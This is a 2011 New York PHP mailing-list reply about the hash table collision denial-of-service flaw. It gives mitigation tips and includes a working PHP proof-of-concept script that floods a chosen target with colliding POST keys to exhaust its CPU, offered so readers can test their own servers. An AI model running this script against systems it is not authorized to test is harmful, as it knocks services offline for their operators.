Hey, Don't allow posts w/> ~100 k/v pairs. Don't allow larger uploads then is necessary. As you mentioned, I guess limit script execution time. Right now, there's some snort signatures going around (Not sure if you run IDS, etc). I've also heard people mention a mod_rewrite regex to strip out these bads chars.
I have a PoC here you can test against your servers: (And here also: http://koto.github.com/blog-kotowicz-net-examples/hashcollision/kill.html) <?php // v--- ripped from: https://github.com/koto/blog-kotowicz-net-examples/tree/master/hashcollision // // generate POST of Doom function doom() { // entries with collisions in PHP hashtable hash function $a = array( '0' => 'Ez', '1' => 'FY', '2' => 'G8', '3' => 'H' . chr(23), '4' => 'D'.chr(122+33), ); // how long should the payload be $length = 7; $size = count($a); $post = ''; $max = pow($size,$length); for ($i = 0; $i < $max; $i++) { $s = str_pad(base_convert($i, 10, $size), $length, '0', STR_PAD_LEFT); $post .= '' . (urlencode(strtr($s, $a))) . '=&'; } return $post; } // hashcollider.php // by sk $post = doom(); $ch = curl_init(); $args = getopt("h:"); $host = $args['h']; curl_setopt($ch, CURLOPT_URL, $host); curl_setopt($ch, CURLOPT_POST, 1 ); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); printf("[x] Target: %s\n", $host); printf("[x] CPU spike!\n"); $result=curl_exec ($ch); printf("[x] Payload sent.\n"); Good luck! - Ben On Dec 29, 2011, at 11:19 AM, Hans C. Kaspersetz wrote: > Good morning, > > I hope everyone has seen the news about the Hash Table Vulnerability in lots > of web scripting languages. You can read about it here: > http://www.securityweek.com/hash-table-collision-attacks-could-trigger-ddos-massive-scale > or here http://www.kb.cert.org/vuls/id/903934. > > It looks like PHP has addressed the issue > (http://www.php.net/archive/2011.php#id2011-12-25-1) by providing a max var > directive in the latest RC5 for 5.4.0. However, with all release candidates > they are strongly advising against using it in production. > > What is the general consensus for mitigating this risk without moving to RC5? > > We are limiting the execution time of our scripts, however for upload scripts > or processing intensive scripts we need to increase the execution time which > I image would leave those scripts more vulnerable. > > Thanks, > Hans Kaspersetz > Cyber X Designs > http://cyberxdesigns.com > > _______________________________________________ > New York PHP Users Group Community Talk Mailing List > http://lists.nyphp.org/mailman/listinfo/talk > > http://www.nyphp.org/Show-Participation
_______________________________________________ New York PHP Users Group Community Talk Mailing List http://lists.nyphp.org/mailman/listinfo/talk http://www.nyphp.org/Show-Participation
